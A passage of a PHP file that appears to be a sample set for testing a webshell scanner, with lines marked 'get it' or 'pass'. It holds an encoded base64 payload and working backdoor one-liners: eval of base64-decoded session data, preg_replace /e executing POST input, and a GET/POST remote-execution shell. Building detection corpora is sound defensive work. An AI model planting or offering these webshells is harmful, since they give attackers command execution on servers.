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'))); 55 | ${expr}(); //get it 56 | $b[0] = 'system'; //pass 57 | $b[0]('ipconfig'); //get is 58 | $b{0}('ipconfig'); //get is 59 | echo $b[0]; //pass 60 | echo $b{0}; //pass 61 | 62 | ${@func1}(); //get it 63 | $$a(); //get it 64 | ${true?$func1:$func2}(); //get it 65 | ${2+1}(); //get it 66 | ${2+1}; //pass 67 | ${@func}; //pass 68 | $evil = ''; 69 | ${ $ {func}}($evil); //get it 70 | ${(array)function(){}}($evil); //get it 71 | @preg_replace("/[pageerror]/e",$_POST['error'],"cfc"); //get it 72 | header('HTTP/1.1 404 Not Found'); 73 | 74 | preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a'); //get it 75 | 76 | if(reset($a) == '10' && count($a) == 9) { 77 | eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6))))); //get it 78 | } 79 | 80 | ($_=@$_GET[2]).@$_($_POST[1]); //get it 81 | 82 | $_=""; 83 | $_[+""]=''; 84 | $_="$_".""; 85 | $_=($_[+""]|"").($_[+""]|"").($_[+""]^""); //get it 86 | 87 | $hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; 88 | $hh("/[discuz]/e",$_POST['h'],"Access"); //get it 89 | ${'_'.$_}['_'](${'_'.$_}['__']); //get it 90 | ?> 91 | //get it 92 | 93 | 104 | --------------------------------------------------------------------------------